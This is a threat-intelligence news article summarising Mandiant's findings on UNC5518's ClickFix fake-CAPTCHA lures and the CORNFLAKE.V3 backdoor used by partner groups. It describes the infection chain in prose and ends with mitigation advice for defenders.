ClickFix and CORNFLAKE.V3: Mandiant Uncovers a New Wave of Access-as-a-Service Campaigns
Ddos 
Mandiant researchers have uncovered a sophisticated cybercrime operation where compromised websites are weaponized with fake CAPTCHA pages to trick users into launching malware. The analysis attributes this activity to UNC5518, a financially motivated threat cluster that provides access-as-a-service for other cybercriminal groups.
Since June 2024, Mandiant has tracked UNC5518βs use of ClickFix, a deceptive technique in which fake CAPTCHA verification pages are used to trick visitors into executing hidden scripts. As Mandiant explains, βthis deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain.β
The lure often works by copying a malicious PowerShell command to the clipboard when a victim clicks on the CAPTCHA image. Unsuspecting users then paste and run the command via the Windows Run dialog box, triggering the download of a malicious payload.
The latest campaign studied by Mandiant involves the deployment of CORNFLAKE.V3, a backdoor attributed to UNC5774, another financially motivated group partnering with UNC5518. According to Mandiant, βCORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP that retrieves payloads via HTTP.β
This malware expands on earlier CORNFLAKE versions by adding persistence and support for multiple payload types. It can execute DLLs, EXEs, JavaScript, BAT scripts, and even PowerShell commands. Mandiant noted that βunlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.β
The Node.js variant of CORNFLAKE.V3 is particularly insidious: it downloads and installs the Node.js runtime to execute embedded malicious code, performs reconnaissance, and even attempts Kerberoasting for credential harvesting.
Mandiant also identified a newer PHP-based variant of CORNFLAKE.V3. This version maintains similar backdoor capabilities but introduces additional commands, including ACTIVE (heartbeat reporting) and AUTORUN (automated persistence). The analysis warns that βthese changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.β
Both variants can receive commands from command-and-control (C2) servers, execute reconnaissance scripts, and deploy secondary malware. In one instance, CORNFLAKE.V3 dropped the WINDYTWIST.SEA backdoor, a powerful implant capable of reverse shells, command execution, and lateral movement.
What makes this campaign unique is its collaborative nature. UNC5518 is not solely focused on exploiting victims but rather monetizes its foothold by providing other groups with entry access. Mandiant highlights, βwhile the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups.β
Groups such as UNC5774 (operators of CORNFLAKE) and UNC4108 (associated with tools like VOLTMARKER and NetSupport RAT) have been observed leveraging UNC5518βs access to further their own objectives.
To mitigate risks, defenders should:
- Disable or restrict the Windows Run dialog where possible.
- Conduct regular phishing and social engineering simulations to prepare employees against ClickFix-style attacks.
- Implement robust logging and monitoring to detect suspicious registry changes, PowerShell executions, and unusual outbound connections.
As Mandiant concludes, βthis investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor.β
Related Posts:
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
- Cybercriminals Exploit CAPTCHA to Deliver Malware: Experts Issue Warning
- Booking.com Spoofed in ClickFix Malware Surge Targeting Hotels and Travel Sector
- Fake CAPTCHA Phishing Campaign Impacts Over 1,150 Organizations
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
